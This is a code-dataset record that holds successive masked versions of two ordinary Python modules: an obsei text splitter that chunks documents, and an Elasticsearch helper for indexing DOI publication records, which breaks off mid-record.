segmented_data=input_data.segmented_data,
meta={**input_data.meta, **{"splitter": split}}
if input_data.meta
else {"splitter": split},
)
text_splits.append(payload)
return text_splits
@staticmethod
def _valid_index(document: str, idx: int):
if idx <= 0:
return 0
if idx >= len(document):
return len(document)
new_idx = idx
while new_idx > 0:
if document[new_idx] in [" ", "\n", "\t"]:
break
new_idx -= 1
return new_idx
|
normal
|
{
"blob_id": "151cc71ff1a63897238e2cc55269bd20cc6ee577",
"index": 2336,
"step-1": "<mask token>\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0\n document_id_key: Optional[str]\n\n\nclass TextSplitter(BaseTextPreprocessor):\n\n def preprocess_input(self, input_list: List[TextPayload], config:\n TextSplitterConfig, **kwargs) ->List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (config.document_id_key and input_data.meta and config.\n document_id_key in input_data.meta):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = self._valid_index(input_data.processed_text,\n start_idx - config.split_stride) + 1\n end_idx = self._valid_index(input_data.processed_text, min(\n start_idx + config.max_split_length, document_length))\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(TextSplitterPayload(phrase=phrase,\n chunk_id=split_id, chunk_length=len(phrase),\n start_index=start_idx, end_index=end_idx, document_id=\n document_id, text_length=document_length))\n start_idx = end_idx + 1\n split_id += 1\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(processed_text=split.phrase,\n source_name=input_data.source_name, segmented_data=\n input_data.segmented_data, meta={**input_data.meta, **{\n 'splitter': split}} if input_data.meta else {'splitter':\n split})\n text_splits.append(payload)\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [' ', '\\n', '\\t']:\n break\n new_idx -= 1\n return new_idx\n",
"step-2": "<mask token>\n\n\nclass TextSplitterPayload(BaseModel):\n phrase: str\n chunk_id: int\n chunk_length: int\n start_index: int\n end_index: int\n document_id: str\n text_length: int\n total_chunks: Optional[int]\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0\n document_id_key: Optional[str]\n\n\nclass TextSplitter(BaseTextPreprocessor):\n\n def preprocess_input(self, input_list: List[TextPayload], config:\n TextSplitterConfig, **kwargs) ->List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (config.document_id_key and input_data.meta and config.\n document_id_key in input_data.meta):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = self._valid_index(input_data.processed_text,\n start_idx - config.split_stride) + 1\n end_idx = self._valid_index(input_data.processed_text, min(\n start_idx + config.max_split_length, document_length))\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(TextSplitterPayload(phrase=phrase,\n chunk_id=split_id, chunk_length=len(phrase),\n start_index=start_idx, end_index=end_idx, document_id=\n document_id, text_length=document_length))\n start_idx = end_idx + 1\n split_id += 1\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(processed_text=split.phrase,\n source_name=input_data.source_name, segmented_data=\n input_data.segmented_data, meta={**input_data.meta, **{\n 'splitter': split}} if input_data.meta else {'splitter':\n split})\n text_splits.append(payload)\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [' ', '\\n', '\\t']:\n break\n new_idx -= 1\n return new_idx\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n\n\nclass TextSplitterPayload(BaseModel):\n phrase: str\n chunk_id: int\n chunk_length: int\n start_index: int\n end_index: int\n document_id: str\n text_length: int\n total_chunks: Optional[int]\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0\n document_id_key: Optional[str]\n\n\nclass TextSplitter(BaseTextPreprocessor):\n\n def preprocess_input(self, input_list: List[TextPayload], config:\n TextSplitterConfig, **kwargs) ->List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (config.document_id_key and input_data.meta and config.\n document_id_key in input_data.meta):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = self._valid_index(input_data.processed_text,\n start_idx - config.split_stride) + 1\n end_idx = self._valid_index(input_data.processed_text, min(\n start_idx + config.max_split_length, document_length))\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(TextSplitterPayload(phrase=phrase,\n chunk_id=split_id, chunk_length=len(phrase),\n start_index=start_idx, end_index=end_idx, document_id=\n document_id, text_length=document_length))\n start_idx = end_idx + 1\n split_id += 1\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(processed_text=split.phrase,\n source_name=input_data.source_name, segmented_data=\n input_data.segmented_data, meta={**input_data.meta, **{\n 'splitter': split}} if input_data.meta else {'splitter':\n split})\n text_splits.append(payload)\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [' ', '\\n', '\\t']:\n break\n new_idx -= 1\n return new_idx\n",
"step-4": "import logging\nfrom typing import List, Optional\nimport uuid\nfrom pydantic import BaseModel\nfrom obsei.payload import TextPayload\nfrom obsei.preprocessor.base_preprocessor import BaseTextPreprocessor, BaseTextProcessorConfig\nlogger = logging.getLogger(__name__)\n\n\nclass TextSplitterPayload(BaseModel):\n phrase: str\n chunk_id: int\n chunk_length: int\n start_index: int\n end_index: int\n document_id: str\n text_length: int\n total_chunks: Optional[int]\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0\n document_id_key: Optional[str]\n\n\nclass TextSplitter(BaseTextPreprocessor):\n\n def preprocess_input(self, input_list: List[TextPayload], config:\n TextSplitterConfig, **kwargs) ->List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (config.document_id_key and input_data.meta and config.\n document_id_key in input_data.meta):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = self._valid_index(input_data.processed_text,\n start_idx - config.split_stride) + 1\n end_idx = self._valid_index(input_data.processed_text, min(\n start_idx + config.max_split_length, document_length))\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(TextSplitterPayload(phrase=phrase,\n chunk_id=split_id, chunk_length=len(phrase),\n start_index=start_idx, end_index=end_idx, document_id=\n document_id, text_length=document_length))\n start_idx = end_idx + 1\n split_id += 1\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(processed_text=split.phrase,\n source_name=input_data.source_name, segmented_data=\n input_data.segmented_data, meta={**input_data.meta, **{\n 'splitter': split}} if input_data.meta else {'splitter':\n split})\n text_splits.append(payload)\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [' ', '\\n', '\\t']:\n break\n new_idx -= 1\n return new_idx\n",
"step-5": "import logging\nfrom typing import List, Optional\nimport uuid\n\nfrom pydantic import BaseModel\n\nfrom obsei.payload import TextPayload\nfrom obsei.preprocessor.base_preprocessor import (\n BaseTextPreprocessor,\n BaseTextProcessorConfig,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass TextSplitterPayload(BaseModel):\n phrase: str\n chunk_id: int\n chunk_length: int\n start_index: int\n end_index: int\n document_id: str\n text_length: int\n total_chunks: Optional[int]\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0 # overlap length\n document_id_key: Optional[str] # document_id in meta\n\n\nclass TextSplitter(BaseTextPreprocessor):\n def preprocess_input( # type: ignore[override]\n self, input_list: List[TextPayload], config: TextSplitterConfig, **kwargs\n ) -> List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (\n config.document_id_key\n and input_data.meta\n and config.document_id_key in input_data.meta\n ):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = (\n self._valid_index(\n input_data.processed_text, start_idx - config.split_stride\n )\n + 1\n )\n end_idx = self._valid_index(\n input_data.processed_text,\n min(start_idx + config.max_split_length, document_length),\n )\n\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(\n TextSplitterPayload(\n phrase=phrase,\n chunk_id=split_id,\n chunk_length=len(phrase),\n start_index=start_idx,\n end_index=end_idx,\n document_id=document_id,\n text_length=document_length,\n )\n )\n start_idx = end_idx + 1\n split_id += 1\n\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(\n processed_text=split.phrase,\n source_name=input_data.source_name,\n segmented_data=input_data.segmented_data,\n meta={**input_data.meta, **{\"splitter\": split}}\n if input_data.meta\n else {\"splitter\": split},\n )\n text_splits.append(payload)\n\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [\" \", \"\\n\", \"\\t\"]:\n break\n new_idx -= 1\n return new_idx\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from elasticsearch import Elasticsearch, helpers
from bso.server.main.config import ES_LOGIN_BSO_BACK, ES_PASSWORD_BSO_BACK, ES_URL
from bso.server.main.decorator import exception_handler
from bso.server.main.logger import get_logger
client = None
logger = get_logger(__name__)
@exception_handler
def get_client():
global client
if client is None:
client = Elasticsearch(ES_URL, http_auth=(ES_LOGIN_BSO_BACK, ES_PASSWORD_BSO_BACK))
return client
@exception_handler
def get_doi_not_in_index(index, dois):
es = get_client()
results = es.search(
index=index,
body={"query": {"bool": {"filter": [{'terms': {'doi.keyword': dois}}]}}, "fields": ['doi'], "size": len(dois),
"_source": False},
request_timeout=60*5
)
existing_dois = set([e['fields']['doi'][0] for e in results['hits']['hits']])
not_indexed_dois = set(dois) - existing_dois
res = []
for doi in list(not_indexed_dois):
res += get_doi_not_in_index_one(index, doi)
logger.debug(f'{len(res)} dois not in index detected')
return res
@exception_handler
def get_doi_not_in_index_one(index, doi):
es = get_client()
results = es.search(
index=index,
request_cache=False,
body={"query": {"bool": {"filter": [{'term': {'doi.keyword': doi}}]}}, "fields": ['doi'], "_source": True},
request_timeout=60*5
)
existing_dois = set([e['fields']['doi'][0] for e in results['hits']['hits']])
not_indexed_dois = set([doi]) - existing_dois
return list(not_indexed_dois)
@exception_handler
def update_local_affiliations(index, current_dois, local_affiliations):
es = get_client()
logger.debug(f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois')
body = {
"script": {
"lang": "painless",
"refresh": True,
"conflicts": "proceed",
"inline": "if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations ="
" new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);"
"ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct()"
".sorted().collect(Collectors.toList())",
"params": {"local_affiliations": local_affiliations}
},
"query": {
"bool": {
"filter": [{
"terms": {
"doi.keyword": current_dois
}
}]
}
}
}
es.update_by_query(index=index, body=body, request_timeout=60*5)
@exception_handler
def delete_index(index: str) -> None:
logger.debug(f'Deleting {index}')
es = get_client()
response = es.indices.delete(index=index, ignore=[400, 404])
logger.debug(response)
@exception_handler
def update_alias(alias: str, old_index: str, new_index: str) -> None:
es = get_client()
logger.debug(f'updating alias {alias} from {old_index} to {new_index}')
response = es.indices.update_aliases({
'actions': [
{'remove': {'index': old_index, 'alias': alias}},
{'add': {'index': new_index, 'alias': alias}}
]
})
logger.debug(response)
def get_analyzers() -> dict:
return {
'light': {
'tokenizer': 'icu_tokenizer',
'filter': [
'lowercase',
'french_elision',
'icu_folding'
]
}
}
def get_filters() -> dict:
return {
'french_elision': {
'type': 'elision',
'articles_case': True,
'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu', 'quoiqu', 'lorsqu', 'puisqu']
}
}
@exception_handler
def reset_index(index: str) -> None:
es = get_client()
delete_index(index)
settings = {
'analysis': {
'filter': get_filters(),
'analyzer': get_analyzers()
}
}
dynamic_match = None
if 'bso-publications' in index:
# dynamic_match = "*oa_locations"
dynamic_match = None
elif 'publications-' in index:
dynamic_match = "*authors"
mappings = { 'properties': {} }
# attention l'analyzer .keyword ne sera pas présent pour ce champs !
for f in ['title', 'affiliations.name', 'authors.first_name', 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:
mappings['properties'][f] = {
'type': 'text',
'analyzer': 'light'
}
if dynamic_match:
mappings["dynamic_templates"] = [
{
"objects": {
"match": dynamic_match,
"match_mapping_type": "object",
"mapping": {
"type": "nested"
}
}
}
]
response = es.indices.create(
index=index,
body={'settings': settings, 'mappings': mappings},
ignore=400 # ignore 400 already exists code
)
if 'acknowledged' in response and response['acknowledged']:
response = str(response['index'])
logger.debug(f'Index mapping success for index: {response}')
@exception_handler
def load_in_es(data: list, index: str) -> list:
es = get_client()
actions = [{'_index': index, '_source': datum} for datum in data]
ix = 0
indexed = []
for success, info in helpers.parallel_bulk(client=es, actions=actions, chunk_size=500, request_timeout=60,
raise_on_error=False):
if not success:
logger.debug(f'A document failed: {info}')
else:
indexed.append(data[ix])
ix += 1
logger.debug(f'{len(data)} elements imported into {index}')
return indexed
|
normal
|
{
"blob_id": "9f760c0cf2afc746a1fc19ac68d1b2f406c7efe1",
"index": 5767,
"step-1": "<mask token>\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(index=index, body={'query': {'bool': {'filter': [{\n 'terms': {'doi.keyword': dois}}]}}, 'fields': ['doi'], 'size': len(\n dois), '_source': False}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(index=index, request_cache=False, body={'query': {\n 'bool': {'filter': [{'term': {'doi.keyword': doi}}]}}, 'fields': [\n 'doi'], '_source': True}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(\n f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois'\n )\n body = {'script': {'lang': 'painless', 'refresh': True, 'conflicts':\n 'proceed', 'inline':\n 'if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations = new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct().sorted().collect(Collectors.toList())'\n , 'params': {'local_affiliations': local_affiliations}}, 'query': {\n 'bool': {'filter': [{'terms': {'doi.keyword': current_dois}}]}}}\n es.update_by_query(index=index, body=body, request_timeout=60 * 5)\n\n\n@exception_handler\ndef delete_index(index: str) ->None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n<mask token>\n\n\ndef get_analyzers() ->dict:\n return {'light': {'tokenizer': 'icu_tokenizer', 'filter': ['lowercase',\n 'french_elision', 'icu_folding']}}\n\n\n<mask token>\n\n\n@exception_handler\ndef reset_index(index: str) ->None:\n es = get_client()\n delete_index(index)\n settings = {'analysis': {'filter': get_filters(), 'analyzer':\n get_analyzers()}}\n dynamic_match = None\n if 'bso-publications' in index:\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = '*authors'\n mappings = {'properties': {}}\n for f in ['title', 'affiliations.name', 'authors.first_name',\n 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] = {'type': 'text', 'analyzer': 'light'}\n if dynamic_match:\n mappings['dynamic_templates'] = [{'objects': {'match':\n dynamic_match, 'match_mapping_type': 'object', 'mapping': {\n 'type': 'nested'}}}]\n response = es.indices.create(index=index, body={'settings': settings,\n 'mappings': mappings}, ignore=400)\n if 'acknowledged' in response and response['acknowledged']:\n response = str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) ->list:\n es = get_client()\n actions = [{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions,\n chunk_size=500, request_timeout=60, raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into {index}')\n return indexed\n",
"step-2": "<mask token>\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(index=index, body={'query': {'bool': {'filter': [{\n 'terms': {'doi.keyword': dois}}]}}, 'fields': ['doi'], 'size': len(\n dois), '_source': False}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(index=index, request_cache=False, body={'query': {\n 'bool': {'filter': [{'term': {'doi.keyword': doi}}]}}, 'fields': [\n 'doi'], '_source': True}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(\n f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois'\n )\n body = {'script': {'lang': 'painless', 'refresh': True, 'conflicts':\n 'proceed', 'inline':\n 'if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations = new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct().sorted().collect(Collectors.toList())'\n , 'params': {'local_affiliations': local_affiliations}}, 'query': {\n 'bool': {'filter': [{'terms': {'doi.keyword': current_dois}}]}}}\n es.update_by_query(index=index, body=body, request_timeout=60 * 5)\n\n\n@exception_handler\ndef delete_index(index: str) ->None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n<mask token>\n\n\ndef get_analyzers() ->dict:\n return {'light': {'tokenizer': 'icu_tokenizer', 'filter': ['lowercase',\n 'french_elision', 'icu_folding']}}\n\n\ndef get_filters() ->dict:\n return {'french_elision': {'type': 'elision', 'articles_case': True,\n 'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu',\n 'quoiqu', 'lorsqu', 'puisqu']}}\n\n\n@exception_handler\ndef reset_index(index: str) ->None:\n es = get_client()\n delete_index(index)\n settings = {'analysis': {'filter': get_filters(), 'analyzer':\n get_analyzers()}}\n dynamic_match = None\n if 'bso-publications' in index:\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = '*authors'\n mappings = {'properties': {}}\n for f in ['title', 'affiliations.name', 'authors.first_name',\n 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] = {'type': 'text', 'analyzer': 'light'}\n if dynamic_match:\n mappings['dynamic_templates'] = [{'objects': {'match':\n dynamic_match, 'match_mapping_type': 'object', 'mapping': {\n 'type': 'nested'}}}]\n response = es.indices.create(index=index, body={'settings': settings,\n 'mappings': mappings}, ignore=400)\n if 'acknowledged' in response and response['acknowledged']:\n response = str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) ->list:\n es = get_client()\n actions = [{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions,\n chunk_size=500, request_timeout=60, raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into {index}')\n return indexed\n",
"step-3": "<mask token>\n\n\n@exception_handler\ndef get_client():\n global client\n if client is None:\n client = Elasticsearch(ES_URL, http_auth=(ES_LOGIN_BSO_BACK,\n ES_PASSWORD_BSO_BACK))\n return client\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(index=index, body={'query': {'bool': {'filter': [{\n 'terms': {'doi.keyword': dois}}]}}, 'fields': ['doi'], 'size': len(\n dois), '_source': False}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(index=index, request_cache=False, body={'query': {\n 'bool': {'filter': [{'term': {'doi.keyword': doi}}]}}, 'fields': [\n 'doi'], '_source': True}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(\n f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois'\n )\n body = {'script': {'lang': 'painless', 'refresh': True, 'conflicts':\n 'proceed', 'inline':\n 'if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations = new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct().sorted().collect(Collectors.toList())'\n , 'params': {'local_affiliations': local_affiliations}}, 'query': {\n 'bool': {'filter': [{'terms': {'doi.keyword': current_dois}}]}}}\n es.update_by_query(index=index, body=body, request_timeout=60 * 5)\n\n\n@exception_handler\ndef delete_index(index: str) ->None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n<mask token>\n\n\ndef get_analyzers() ->dict:\n return {'light': {'tokenizer': 'icu_tokenizer', 'filter': ['lowercase',\n 'french_elision', 'icu_folding']}}\n\n\ndef get_filters() ->dict:\n return {'french_elision': {'type': 'elision', 'articles_case': True,\n 'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu',\n 'quoiqu', 'lorsqu', 'puisqu']}}\n\n\n@exception_handler\ndef reset_index(index: str) ->None:\n es = get_client()\n delete_index(index)\n settings = {'analysis': {'filter': get_filters(), 'analyzer':\n get_analyzers()}}\n dynamic_match = None\n if 'bso-publications' in index:\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = '*authors'\n mappings = {'properties': {}}\n for f in ['title', 'affiliations.name', 'authors.first_name',\n 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] = {'type': 'text', 'analyzer': 'light'}\n if dynamic_match:\n mappings['dynamic_templates'] = [{'objects': {'match':\n dynamic_match, 'match_mapping_type': 'object', 'mapping': {\n 'type': 'nested'}}}]\n response = es.indices.create(index=index, body={'settings': settings,\n 'mappings': mappings}, ignore=400)\n if 'acknowledged' in response and response['acknowledged']:\n response = str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) ->list:\n es = get_client()\n actions = [{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions,\n chunk_size=500, request_timeout=60, raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into {index}')\n return indexed\n",
"step-4": "<mask token>\nclient = None\nlogger = get_logger(__name__)\n\n\n@exception_handler\ndef get_client():\n global client\n if client is None:\n client = Elasticsearch(ES_URL, http_auth=(ES_LOGIN_BSO_BACK,\n ES_PASSWORD_BSO_BACK))\n return client\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(index=index, body={'query': {'bool': {'filter': [{\n 'terms': {'doi.keyword': dois}}]}}, 'fields': ['doi'], 'size': len(\n dois), '_source': False}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(index=index, request_cache=False, body={'query': {\n 'bool': {'filter': [{'term': {'doi.keyword': doi}}]}}, 'fields': [\n 'doi'], '_source': True}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(\n f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois'\n )\n body = {'script': {'lang': 'painless', 'refresh': True, 'conflicts':\n 'proceed', 'inline':\n 'if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations = new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct().sorted().collect(Collectors.toList())'\n , 'params': {'local_affiliations': local_affiliations}}, 'query': {\n 'bool': {'filter': [{'terms': {'doi.keyword': current_dois}}]}}}\n es.update_by_query(index=index, body=body, request_timeout=60 * 5)\n\n\n@exception_handler\ndef delete_index(index: str) ->None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n@exception_handler\ndef update_alias(alias: str, old_index: str, new_index: str) ->None:\n es = get_client()\n logger.debug(f'updating alias {alias} from {old_index} to {new_index}')\n response = es.indices.update_aliases({'actions': [{'remove': {'index':\n old_index, 'alias': alias}}, {'add': {'index': new_index, 'alias':\n alias}}]})\n logger.debug(response)\n\n\ndef get_analyzers() ->dict:\n return {'light': {'tokenizer': 'icu_tokenizer', 'filter': ['lowercase',\n 'french_elision', 'icu_folding']}}\n\n\ndef get_filters() ->dict:\n return {'french_elision': {'type': 'elision', 'articles_case': True,\n 'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu',\n 'quoiqu', 'lorsqu', 'puisqu']}}\n\n\n@exception_handler\ndef reset_index(index: str) ->None:\n es = get_client()\n delete_index(index)\n settings = {'analysis': {'filter': get_filters(), 'analyzer':\n get_analyzers()}}\n dynamic_match = None\n if 'bso-publications' in index:\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = '*authors'\n mappings = {'properties': {}}\n for f in ['title', 'affiliations.name', 'authors.first_name',\n 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] = {'type': 'text', 'analyzer': 'light'}\n if dynamic_match:\n mappings['dynamic_templates'] = [{'objects': {'match':\n dynamic_match, 'match_mapping_type': 'object', 'mapping': {\n 'type': 'nested'}}}]\n response = es.indices.create(index=index, body={'settings': settings,\n 'mappings': mappings}, ignore=400)\n if 'acknowledged' in response and response['acknowledged']:\n response = str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) ->list:\n es = get_client()\n actions = [{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions,\n chunk_size=500, request_timeout=60, raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into 